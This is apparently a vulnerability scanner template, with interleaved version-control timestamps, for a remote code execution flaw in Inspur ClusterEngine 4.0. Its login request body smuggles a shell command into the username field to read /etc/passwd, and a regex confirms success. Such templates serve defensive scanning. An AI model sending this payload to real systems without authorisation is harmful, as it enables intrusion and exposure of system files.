2021-03-03 13:44:11 +00:00
id : CVE-2020-21224
info :
2022-04-29 19:58:07 +00:00
name : Inspur ClusterEngine 4.0 - Remote Code Execution
2021-03-03 13:44:11 +00:00
author : pikpikcu
severity : critical
2022-03-29 10:33:49 +00:00
description : Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.
reference :
- https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
- https://nvd.nist.gov/vuln/detail/CVE-2020-21224
2022-05-17 09:18:12 +00:00
- https://github.com/NS-Sp4ce/Inspur/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-21224
cwe-id : CWE-88
2023-08-31 11:46:18 +00:00
epss-score : 0.03105
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.89779
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : inspur
product : clusterengine
tags : cve,cve2020,clusterengine,rce
2021-03-03 13:44:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-03 13:44:11 +00:00
- method : POST
path :
2021-03-16 10:38:58 +00:00
- "{{BaseURL}}/login"
2021-03-17 09:56:31 +00:00
2021-03-16 10:38:58 +00:00
body : |
2021-08-19 14:44:46 +00:00
op=login&username=;`cat /etc/passwd`&password=
2021-03-03 13:44:11 +00:00
2023-07-11 19:49:27 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
Referer : "{{Hostname}}/module/login/login.html"
2021-03-03 13:44:11 +00:00
matchers-condition : and
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2021-03-03 13:44:11 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-03-03 13:44:11 +00:00
- type : status
status :
2021-03-16 10:38:58 +00:00
- 200